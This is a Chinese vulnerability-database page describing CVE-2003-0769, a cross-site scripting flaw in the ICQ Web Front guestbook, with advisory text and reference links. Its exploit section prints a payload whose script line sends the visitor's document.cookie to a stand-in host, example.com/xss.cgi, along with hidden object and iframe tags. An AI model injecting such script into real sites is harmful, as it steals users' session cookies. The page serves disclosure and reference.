ICQ Web Front guestbook (guestbook.html)存在跨站脚本漏洞

ICQ Web Front guestbook (guestbook.html)存在跨站脚本漏洞

漏洞ID 1107477 漏洞类型 跨站脚本
发布时间 2003-09-08 更新时间 2005-10-20
图片[1]-ICQ Web Front guestbook (guestbook.html)存在跨站脚本漏洞-安全小百科CVE编号 CVE-2003-0769
图片[2]-ICQ Web Front guestbook (guestbook.html)存在跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200309-034
漏洞平台 ASP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/23120
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200309-034
|漏洞详情
ICQWebFrontguestbook(guestbook.html)存在跨站脚本(XSS)漏洞。远程攻击者借助消息字段插入任意web脚本和HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/8563/info

It has been reported that ICQ Webfront is prone to a cross-site scripting vulnerability in the message field of the guestbook module. This issue is caused by improper sanitization of user-supplied data.

Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials from a user. Other attacks are possible as well.

<object style="display:none" data="http://www.example.com/bad.asp"></object>
<SCRIPT>location.href="http://www.example.com/xss.cgi?ref="+document.URL+"cookie="+document.cookie;</script>
<iframe src="http://www.example.com"></iframe>
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:mirabilis:icq:2003a_build3777*cpe:/a:mirabilis:icq:2003a_build3799*cpe:/a:mirabilis:icq:2003a_build3800*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0769

相关推荐: LICQ Rich Text Denial of Service Vulnerability

LICQ Rich Text Denial of Service Vulnerability 漏洞ID 1103540 漏洞类型 Input Validation Error 发布时间 2001-02-12 更新时间 2001-02-12 CVE编号 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享